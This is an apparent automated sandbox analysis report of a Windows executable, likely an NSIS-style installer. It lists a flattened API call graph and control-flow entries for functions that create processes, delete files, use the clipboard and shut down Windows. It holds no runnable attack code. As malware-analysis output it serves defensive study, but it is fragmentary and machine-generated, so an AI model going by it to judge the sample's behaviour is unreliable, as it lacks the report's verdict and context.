3880->3884 3885 40358d WriteFile 3880->3885 3881->3876 3882 403336 ReadFile 3882->3883 3883->3876 3883->3882 3887 40348a GetTickCount 3883->3887 3888 4034af MulDiv wsprintfW 3883->3888 3890 4034f3 WriteFile 3883->3890 3884->3880 3885->3876 3886 4035a1 3885->3886 3886->3876 3886->3880 3887->3883 3889 404f9e 25 API calls 3888->3889 3889->3883 3890->3876 3890->3883 3891->3827 3892->3826 3894 401a75 lstrcatW 3893->3894 3895 40676b lstrcatW 3893->3895 3894->3827 3895->3894 3897 405e79 3896->3897 3898 405e6b SetFileAttributesW 3896->3898 3897->3861 3898->3897 3900 405ce1 3899->3900 3901 405d2f 3900->3901 3902 405cf7 MessageBoxIndirectW 3900->3902 3901->3861 3902->3901 3904 403357 3903->3904 3904->3876 3904->3877 3904->3878 3905->3872 4858 40209f GetDlgItem GetClientRect 4859 40145c 18 API calls 4858->4859 4860 4020cf LoadImageW SendMessageW 4859->4860 4861 4030e3 4860->4861 4862 4020ed DeleteObject 4860->4862 4862->4861 4863 402b9f 4864 401446 18 API calls 4863->4864 4868 402ba7 4864->4868 4865 402c4a 4866 402bdf ReadFile 4866->4868 4875 402c3d 4866->4875 4867 401446 18 API calls 4867->4875 4868->4865 4868->4866 4869 402c06 MultiByteToWideChar 4868->4869 4870 402c3f 4868->4870 4871 402c4f 4868->4871 4868->4875 4869->4868 4869->4871 4876 405f7d wsprintfW 4870->4876 4873 402c6b SetFilePointer 4871->4873 4871->4875 4873->4875 4874 402d17 ReadFile 4874->4875 4875->4865 4875->4867 4875->4874 4876->4865 4877 402b23 GlobalAlloc 4878 402b39 4877->4878 4879 402b4b 4877->4879 4880 401446 18 API calls 4878->4880 4881 40145c 18 API calls 4879->4881 4883 402b41 4880->4883 4882 402b52 WideCharToMultiByte lstrlenA 4881->4882 4882->4883 4884 402b84 WriteFile 4883->4884 4885 402b93 4883->4885 4884->4885 4886 402384 GlobalFree 4884->4886 4886->4885 4888 4040a3 4889 4040b0 lstrcpynW lstrlenW 4888->4889 4890 4040ad 4888->4890 4890->4889 3430 4054a5 3431 4055f9 3430->3431 3432 4054bd 3430->3432 3434 40564a 3431->3434 3435 40560a GetDlgItem GetDlgItem 3431->3435 3432->3431 3433 4054c9 3432->3433 3437 4054d4 SetWindowPos 3433->3437 3438 4054e7 3433->3438 3436 4056a4 3434->3436 3444 40139d 80 API calls 3434->3444 3439 403d6b 19 API calls 3435->3439 3445 4055f4 3436->3445 3500 403ddb 3436->3500 3437->3438 3441 405504 3438->3441 3442 4054ec ShowWindow 3438->3442 3443 405634 SetClassLongW 3439->3443 3446 405526 3441->3446 3447 40550c DestroyWindow 3441->3447 3442->3441 3448 40141d 80 API calls 3443->3448 3451 40567c 3444->3451 3449 40552b SetWindowLongW 3446->3449 3450 40553c 3446->3450 3452 405908 3447->3452 3448->3434 3449->3445 3453 4055e5 3450->3453 3454 405548 GetDlgItem 3450->3454 3451->3436 3455 405680 SendMessageW 3451->3455 3452->3445 3461 405939 ShowWindow 3452->3461 3520 403df6 3453->3520 3458 405578 3454->3458 3459 40555b SendMessageW IsWindowEnabled 3454->3459 3455->3445 3456 40141d 80 API calls 3469 4056b6 3456->3469 3457 40590a DestroyWindow KiUserCallbackDispatcher 3457->3452 3463 405585 3458->3463 3466 4055cc SendMessageW 3458->3466 3467 405598 3458->3467 3475 40557d 3458->3475 3459->3445 3459->3458 3461->3445 3462 406831 18 API calls 3462->3469 3463->3466 3463->3475 3465 403d6b 19 API calls 3465->3469 3466->3453 3470 4055a0 3467->3470 3471 4055b5 3467->3471 3468 4055b3 3468->3453 3469->3445 3469->3456 3469->3457 3469->3462 3469->3465 3491 40584a DestroyWindow 3469->3491 3503 403d6b 3469->3503 3514 40141d 3470->3514 3472 40141d 80 API calls 3471->3472 3474 4055bc 3472->3474 3474->3453 3474->3475 3517 403d44 3475->3517 3477 405731 GetDlgItem 3478 405746 3477->3478 3479 40574f ShowWindow KiUserCallbackDispatcher 3477->3479 3478->3479 3506 403db1 KiUserCallbackDispatcher 3479->3506 3481 405779 EnableWindow 3484 40578d 3481->3484 3482 405792 GetSystemMenu EnableMenuItem SendMessageW 3483 4057c2 SendMessageW 3482->3483 3482->3484 3483->3484 3484->3482 3507 403dc4 SendMessageW 3484->3507 3508 406035 lstrcpynW 3484->3508 3487 4057f0 lstrlenW 3488 406831 18 API calls 3487->3488 3489 405806 SetWindowTextW 3488->3489 3509 40139d 3489->3509 3491->3452 3492 405864 CreateDialogParamW 3491->3492 3492->3452 3493 405897 3492->3493 3494 403d6b 19 API calls 3493->3494 3495 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3494->3495 3496 40139d 80 API calls 3495->3496 3497 4058e8 3496->3497 3497->3445 3498 4058f0 ShowWindow 3497->3498 3499 403ddb SendMessageW 3498->3499 3499->3452 3501 403df3 3500->3501 3502 403de4 SendMessageW 3500->3502 3501->3469 3502->3501 3504 406831 18 API calls 3503->3504 3505 403d76 SetDlgItemTextW 3504->3505 3505->3477 3506->3481 3507->3484 3508->3487 3512 4013a4 3509->3512 3510 401410 3510->3469 3512->3510 3513 4013dd MulDiv SendMessageW 3512->3513 3534 4015a0 3512->3534 3513->3512 3515 40139d 80 API calls 3514->3515 3516 401432 3515->3516 3516->3475 3518 403d51 SendMessageW 3517->3518 3519 403d4b 3517->3519 3518->3468 3519->3518 3521 403e0b GetWindowLongW 3520->3521 3531 403e94 3520->3531 3522 403e1c 3521->3522 3521->3531 3523 403e2b GetSysColor 3522->3523 3524 403e2e 3522->3524 3523->3524 3525 403e34 SetTextColor 3524->3525 3526 403e3e SetBkMode 3524->3526 3525->3526 3527 403e56 GetSysColor 3526->3527 3528 403e5c 3526->3528 3527->3528 3529 403e63 SetBkColor 3528->3529 3530 403e6d 3528->3530 3529->3530 3530->3531 3532 403e80 DeleteObject 3530->3532 3533 403e87 CreateBrushIndirect 3530->3533 3531->3445 3532->3533 3533->3531 3535 4015fa 3534->3535 3614 40160c 3534->3614 3536 401601 3535->3536 3537 401742 3535->3537 3538 401962 3535->3538 3539 4019ca 3535->3539 3540 40176e 3535->3540 3541 401650 3535->3541 3542 4017b1 3535->3542 3543 401672 3535->3543 3544 401693 3535->3544 3545 401616 3535->3545 3546 4016d6 3535->3546 3547 401736 3535->3547 3548 401897 3535->3548 3549 4018db 3535->3549 3550 40163c 3535->3550 3551 4016bd 3535->3551 3535->3614 3560 4062cf 11 API calls 3536->3560 3552 401751 ShowWindow 3537->3552 3553 401758 3537->3553 3557 40145c 18 API calls 3538->3557 3564 40145c 18 API calls 3539->3564 3554 40145c 18 API calls 3540->3554 3578 4062cf 11 API calls 3541->3578 3558 40145c 18 API calls 3542->3558 3555 40145c 18 API calls 3543->3555 3559 401446 18 API calls 3544->3559 3563 40145c 18 API calls 3545->3563 3577 401446 18 API calls 3546->3577 3546->3614 3547->3614 3668 405f7d wsprintfW 3547->3668 3556 40145c 18 API calls 3548->3556 3561 40145c 18 API calls 3549->3561 3565 401647 PostQuitMessage 3550->3565 3550->3614 3562 4062cf 11 API calls 3551->3562 3552->3553 3566 401765 ShowWindow 3553->3566 3553->3614 3567 401775 3554->3567 3568 401678 3555->3568 3569 40189d 3556->3569 3570 401968 GetFullPathNameW 3557->3570 3571 4017b8 3558->3571 3572 40169a 3559->3572 3560->3614 3573 4018e2 3561->3573 3574 4016c7 SetForegroundWindow 3562->3574 3575 40161c 3563->3575 3576 4019d1 SearchPathW 3564->3576 3565->3614 3566->3614 3580 4062cf 11 API calls 3567->3580 3581 4062cf 11 API calls 3568->3581 3659 406301 FindFirstFileW 3569->3659 3583 4019a1 3570->3583 3584 40197f 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 4062cf 11 API calls 3572->3586 3587 40145c 18 API calls 3573->3587 3574->3614 3588 4062cf 11 API calls 3575->3588 3576->3547 3576->3614 3577->3614 3589 401664 3578->3589 3590 401785 SetFileAttributesW 3580->3590 3591 401683 3581->3591 3603 4019b8 GetShortPathNameW 3583->3603 3583->3614 3584->3583 3609 406301 2 API calls 3584->3609 3593 4017c9 3585->3593 3594 4016a7 Sleep 3586->3594 3595 4018eb 3587->3595 3596 401627 3588->3596 3597 40139d 65 API calls 3589->3597 3598 40179a 3590->3598 3590->3614 3607 404f9e 25 API calls 3591->3607 3641 405d85 CharNextW CharNextW 3593->3641 3594->3614 3604 40145c 18 API calls 3595->3604 3605 404f9e 25 API calls 3596->3605 3597->3614 3606 4062cf 11 API calls 3598->3606 3599 4018c2 3610 4062cf 11 API calls 3599->3610 3600 4018a9 3608 4062cf 11 API calls 3600->3608 3603->3614 3612 4018f5 3604->3612 3605->3614 3606->3614 3607->3614 3608->3614 3613 401991 3609->3613 3610->3614 3611 4017d4 3615 401864 3611->3615 3618 405d32 CharNextW 3611->3618 3636 4062cf 11 API calls 3611->3636 3616 4062cf 11 API calls 3612->3616 3613->3583 3667 406035 lstrcpynW 3613->3667 3614->3512 3615->3591 3617 40186e 3615->3617 3619 401902 MoveFileW 3616->3619 3647 404f9e 3617->3647 3622 4017e6 CreateDirectoryW 3618->3622 3623 401912 3619->3623 3624 40191e 3619->3624 3622->3611 3626 4017fe GetLastError 3622->3626 3623->3591 3630 406301 2 API calls 3624->3630 3640 401942 3624->3640 3628 401827 GetFileAttributesW 3626->3628 3629 40180b GetLastError 3626->3629 3628->3611 3633 4062cf 11 API calls 3629->3633 3634 401929 3630->3634 3631 401882 SetCurrentDirectoryW 3631->3614 3632 4062cf 11 API calls 3635 40195c 3632->3635 3633->3611 3634->3640 3662 406c94 3634->3662 3635->3614 3636->3611 3639 404f9e 25 API calls 3639->3640 3640->3632 3642 405da2 3641->3642 3645 405db4 3641->3645 3644 405daf CharNextW 3642->3644 3642->3645 3643 405dd8 3643->3611 3644->3643 3645->3643 3646 405d32 CharNextW 3645->3646 3646->3645 3648 404fb7 3647->3648 3649 401875 3647->3649 3650 404fd5 lstrlenW 3648->3650 3651 406831 18 API calls 3648->3651 3658 406035 lstrcpynW 3649->3658 3652 404fe3 lstrlenW 3650->3652 3653 404ffe 3650->3653 3651->3650 3652->3649 3654 404ff5 lstrcatW 3652->3654 3655 405011 3653->3655 3656 405004 SetWindowTextW 3653->3656 3654->3653 3655->3649 3657 405017 SendMessageW SendMessageW SendMessageW 3655->3657 3656->3655 3657->3649 3658->3631 3660 4018a5 3659->3660 3661 406317 FindClose 3659->3661 3660->3599 3660->3600 3661->3660 3669 406328 GetModuleHandleA 3662->3669 3666 401936 3666->3639 3667->3583 3668->3614 3670 406340 LoadLibraryA 3669->3670 3671 40634b GetProcAddress 3669->3671 3670->3671 3672 406359 3670->3672 3671->3672 3672->3666 3673 406ac5 lstrcpyW 3672->3673 3674 406b13 GetShortPathNameW 3673->3674 3675 406aea 3673->3675 3676 406b2c 3674->3676 3677 406c8e 3674->3677 3699 405e7c GetFileAttributesW CreateFileW 3675->3699 3676->3677 3680 406b34 WideCharToMultiByte 3676->3680 3677->3666 3679 406af3 CloseHandle GetShortPathNameW 3679->3677 3681 406b0b 3679->3681 3680->3677 3682 406b51 WideCharToMultiByte 3680->3682 3681->3674 3681->3677 3682->3677 3683 406b69 wsprintfA 3682->3683 3684 406831 18 API calls 3683->3684 3685 406b95 3684->3685 3700 405e7c GetFileAttributesW CreateFileW 3685->3700 3687 406ba2 3687->3677 3688 406baf GetFileSize GlobalAlloc 3687->3688 3689 406bd0 ReadFile 3688->3689 3690 406c84 CloseHandle 3688->3690 3689->3690 3691 406bea 3689->3691 3690->3677 3691->3690 3701 405de2 lstrlenA 3691->3701 3694 406c03 lstrcpyA 3697 406c25 3694->3697 3695 406c17 3696 405de2 4 API calls 3695->3696 3696->3697 3698 406c5c SetFilePointer WriteFile GlobalFree 3697->3698 3698->3690 3699->3679 3700->3687 3702 405e23 lstrlenA 3701->3702 3703 405e2b 3702->3703 3704 405dfc lstrcmpiA 3702->3704 3703->3694 3703->3695 3704->3703 3705 405e1a CharNextA 3704->3705 3705->3702 4891 402da5 4892 4030e3 4891->4892 4893 402dac 4891->4893 4894 401446 18 API calls 4893->4894 4895 402db8 4894->4895 4896 402dbf SetFilePointer 4895->4896 4896->4892 4897 402dcf 4896->4897 4897->4892 4899 405f7d wsprintfW 4897->4899 4899->4892 4900 4049a8 GetDlgItem GetDlgItem 4901 4049fe 7 API calls 4900->4901 4906 404c16 4900->4906 4902 404aa2 DeleteObject 4901->4902 4903 404a96 SendMessageW 4901->4903 4904 404aad 4902->4904 4903->4902 4907 404ae4 4904->4907 4910 406831 18 API calls 4904->4910 4905 404cfb 4908 404da0 4905->4908 4909 404c09 4905->4909 4914 404d4a SendMessageW 4905->4914 4906->4905 4918 40487a 5 API calls 4906->4918 4931 404c86 4906->4931 4913 403d6b 19 API calls 4907->4913 4911 404db5 4908->4911 4912 404da9 SendMessageW 4908->4912 4915 403df6 8 API calls 4909->4915 4916 404ac6 SendMessageW SendMessageW 4910->4916 4923 404dc7 ImageList_Destroy 4911->4923 4924 404dce 4911->4924 4929 404dde 4911->4929 4912->4911 4919 404af8 4913->4919 4914->4909 4921 404d5f SendMessageW 4914->4921 4922 404f97 4915->4922 4916->4904 4917 404ced SendMessageW 4917->4905 4918->4931 4925 403d6b 19 API calls 4919->4925 4920 404f48 4920->4909 4930 404f5d ShowWindow GetDlgItem ShowWindow 4920->4930 4926 404d72 4921->4926 4923->4924 4927 404dd7 GlobalFree 4924->4927 4924->4929 4933 404b09 4925->4933 4935 404d83 SendMessageW 4926->4935 4927->4929 4928 404bd6 GetWindowLongW SetWindowLongW 4932 404bf0 4928->4932 4929->4920 4934 40141d 80 API calls 4929->4934 4944 404e10 4929->4944 4930->4909 4931->4905 4931->4917 4936 404bf6 ShowWindow 4932->4936 4937 404c0e 4932->4937 4933->4928 4939 404b65 SendMessageW 4933->4939 4940 404bd0 4933->4940 4942 404b93 SendMessageW 4933->4942 4943 404ba7 SendMessageW 4933->4943 4934->4944 4935->4908 4951 403dc4 SendMessageW 4936->4951 4952 403dc4 SendMessageW 4937->4952 4939->4933 4940->4928 4940->4932 4942->4933 4943->4933 4945 404e54 4944->4945 4948 404e3e SendMessageW 4944->4948 4946 404f1f InvalidateRect 4945->4946 4950 404ecd SendMessageW SendMessageW 4945->4950 4946->4920 4947 404f35 4946->4947 4949 4043d9 21 API calls 4947->4949 4948->4945 4949->4920 4950->4945 4951->4909 4952->4906 4953 4030a9 SendMessageW 4954 4030c2 InvalidateRect 4953->4954 4955 4030e3 4953->4955 4954->4955 3906 4038af #17 SetErrorMode OleInitialize 3907 406328 3 API calls 3906->3907 3908 4038f2 SHGetFileInfoW 3907->3908 3980 406035 lstrcpynW 3908->3980 3910 40391d GetCommandLineW 3981 406035 lstrcpynW 3910->3981 3912 40392f GetModuleHandleW 3913 403947 3912->3913 3914 405d32 CharNextW 3913->3914 3915 403956 CharNextW 3914->3915 3926 403968 3915->3926 3916 403a02 3917 403a21 GetTempPathW 3916->3917 3982 4037f8 3917->3982 3919 403a37 3921 403a3b GetWindowsDirectoryW lstrcatW 3919->3921 3922 403a5f DeleteFileW 3919->3922 3920 405d32 CharNextW 3920->3926 3924 4037f8 11 API calls 3921->3924 3990 4035b3 GetTickCount GetModuleFileNameW 3922->3990 3927 403a57 3924->3927 3925 403a73 3928 403af8 3925->3928 3930 405d32 CharNextW 3925->3930 3966 403add 3925->3966 3926->3916 3926->3920 3933 403a04 3926->3933 3927->3922 3927->3928 4075 403885 3928->4075 3934 403a8a 3930->3934 4082 406035 lstrcpynW 3933->4082 3945 403b23 lstrcatW lstrcmpiW 3934->3945 3946 403ab5 3934->3946 3935 403aed 3938 406113 9 API calls 3935->3938 3936 403bfa 3939 403c7d 3936->3939 3941 406328 3 API calls 3936->3941 3937 403b0d 3940 405ccc MessageBoxIndirectW 3937->3940 3938->3928 3942 403b1b ExitProcess 3940->3942 3944 403c09 3941->3944 3948 406328 3 API calls 3944->3948 3945->3928 3947 403b3f CreateDirectoryW SetCurrentDirectoryW 3945->3947 4083 4067aa 3946->4083 3950 403b62 3947->3950 3951 403b57 3947->3951 3952 403c12 3948->3952 4100 406035 lstrcpynW 3950->4100 4099 406035 lstrcpynW 3951->4099 3956 406328 3 API calls 3952->3956 3959 403c1b 3956->3959 3958 403b70 4101 406035 lstrcpynW 3958->4101 3960 403c69 ExitWindowsEx 3959->3960 3965 403c29 GetCurrentProcess 3959->3965 3960->3939 3964 403c76 3960->3964 3961 403ad2 4098 406035 lstrcpynW 3961->4098 3967 40141d 80 API calls 3964->3967 3969 403c39 3965->3969 4018 405958 3966->4018 3967->3939 3968 406831 18 API calls 3970 403b98 DeleteFileW 3968->3970 3969->3960 3971 403ba5 CopyFileW 3970->3971 3977 403b7f 3970->3977 3971->3977 3972 403bee 3973 406c94 42 API calls 3972->3973 3975 403bf5 3973->3975 3974 406c94 42 API calls 3974->3977 3975->3928 3976 406831 18 API calls 3976->3977 3977->3968 3977->3972 3977->3974 3977->3976 3979 403bd9 CloseHandle 3977->3979 4102 405c6b CreateProcessW 3977->4102 3979->3977 3980->3910 3981->3912 3983 406064 5 API calls 3982->3983 3984 403804 3983->3984 3985 40380e 3984->3985 3986 40674e 3 API calls 3984->3986 3985->3919 3987 403816 CreateDirectoryW 3986->3987 3988 405eab 2 API calls 3987->3988 3989 40382a 3988->3989 3989->3919 4105 405e7c GetFileAttributesW CreateFileW 3990->4105 3992 4035f3 4012 403603 3992->4012 4106 406035 lstrcpynW 3992->4106 3994 403619 4107 40677d lstrlenW 3994->4107 3998 40362a GetFileSize 3999 403726 3998->3999 4013 403641 3998->4013 4112 4032d2 3999->4112 4001 40372f 4003 40376b GlobalAlloc 4001->4003 4001->4012 4124 403368 SetFilePointer 4001->4124 4002 403336 ReadFile 4002->4013 4123 403368 SetFilePointer 4003->4123 4006 4037e9 4009 4032d2 6 API calls 4006->4009 4007 403786 4010 40337f 33 API calls 4007->4010 4008 40374c 4011 403336 ReadFile 4008->4011 4009->4012 4016 403792 4010->4016 4015 403757 4011->4015 4012->3925 4013->3999 4013->4002 4013->4006 4013->4012 4014 4032d2 6 API calls 4013->4014 4014->4013 4015->4003 4015->4012 4016->4012 4016->4016 4017 4037c0 SetFilePointer 4016->4017 4017->4012 4019 406328 3 API calls 4018->4019 4020 40596c 4019->4020 4021 405972 4020->4021 4022 405984 4020->4022 4138 405f7d wsprintfW 4021->4138 4023 405eff 3 API calls 4022->4023 4024 4059b5 4023->4024 4026 4059d4 lstrcatW 4024->4026 4028 405eff 3 API calls 4024->4028 4027 405982 4026->4027 4129 403ec1 4027->4129 4028->4026 4031 4067aa 18 API calls 4032 405a06 4031->4032 4033 405a9c 4032->4033 4035 405eff 3 API calls 4032->4035 4034 4067aa 18 API calls 4033->4034 4036 405aa2 4034->4036 4037 405a38 4035->4037 4038 405ab2 4036->4038 4039 406831 18 API calls 4036->4039 4037->4033 4041 405a5b lstrlenW 4037->4041 4044 405d32 CharNextW 4037->4044 4040 405ad2 LoadImageW 4038->4040 4140 403ea0 4038->4140 4039->4038 4042 405b92 4040->4042 4043 405afd RegisterClassW 4040->4043 4045 405a69 lstrcmpiW 4041->4045 4046 405a8f 4041->4046 4050 40141d 80 API calls 4042->4050 4048 405b9c 4043->4048 4049 405b45 SystemParametersInfoW CreateWindowExW 4043->4049 4051 405a56 4044->4051 4045->4046 4052 405a79 GetFileAttributesW 4045->4052 4054 40674e 3 API calls 4046->4054 4048->3935 4049->4042 4055 405b98 4050->4055 4051->4041 4056 405a85 4052->4056 4053 405ac8 4053->4040 4057 405a95 4054->4057 4055->4048 4058 403ec1 19 API calls 4055->4058 4056->4046 4059 40677d 2 API calls 4056->4059 4139 406035 lstrcpynW 4057->4139 4061 405ba9 4058->4061 4059->4046 4062 405bb5 ShowWindow LoadLibraryW 4061->4062 4063 405c38 4061->4063 4064 405bd4 LoadLibraryW 4062->4064 4065 405bdb GetClassInfoW 4062->4065 4066 405073 83 API calls 4063->4066 4064->4065 4067 405c05 DialogBoxParamW 4065->4067 4068 405bef GetClassInfoW RegisterClassW 4065->4068 4069 405c3e 4066->4069 4072 40141d 80 API calls 4067->4072 4068->4067 4070 405c42 4069->4070 4071 405c5a 4069->4071 4070->4048 4074 40141d 80 API calls 4070->4074 4073 40141d 80 API calls 4071->4073 4072->4048 4073->4048 4074->4048 4076 40389d 4075->4076 4077 40388f CloseHandle 4075->4077 4147 403caf 4076->4147 4077->4076 4082->3917 4200 406035 lstrcpynW 4083->4200 4085 4067bb 4086 405d85 4 API calls 4085->4086 4087 4067c1 4086->4087 4088 406064 5 API calls 4087->4088 4095 403ac3 4087->4095 4091 4067d1 4088->4091 4089 406809 lstrlenW 4090 406810 4089->4090 4089->4091 4093 40674e 3 API calls 4090->4093 4091->4089 4092 406301 2 API calls 4091->4092 4091->4095 4096 40677d 2 API calls 4091->4096 4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                                                                                          Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                                          control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
